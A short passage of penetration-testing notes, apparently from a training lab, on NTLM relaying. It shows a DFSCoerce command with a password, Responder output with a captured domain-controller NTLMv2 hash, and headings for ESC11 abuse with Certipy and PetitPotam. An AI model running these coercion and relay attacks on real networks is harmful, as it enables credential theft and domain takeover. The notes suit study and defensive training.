NTLM_Relaying
DFSCoerce
MS-DFSNM DFSCoerce
python3 dfscoerce.py -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' 172.16.117.30 172.16.117.3
[-] Connecting to ncacn_np:172.16.117.3[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot! NetrDfsRemoveStdRoot ServerName: '172.16.117.30\x00' RootShare: 'test\x00' ApiFlags: 1
DCERPC Runtime Error: code: 0x5 - rpc_s_access_deniedResponder
[SMB] NTLMv2-SSP Client : 172.16.117.3
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::INLANEFREIGHT:e2d2339638fc5fd6:D4979A923DD76BC3CFA418E94958E2B0:010100000000000000E0550D97C<SNIP>ESC11
ESCALATION 11
NTLM Relay to AD CS ICRP Endpoints
LINUX
Find vulnerable servers with Certipy
Abusing ESC11 with Certipy
Coerce authentication with PetitPotam
Last updated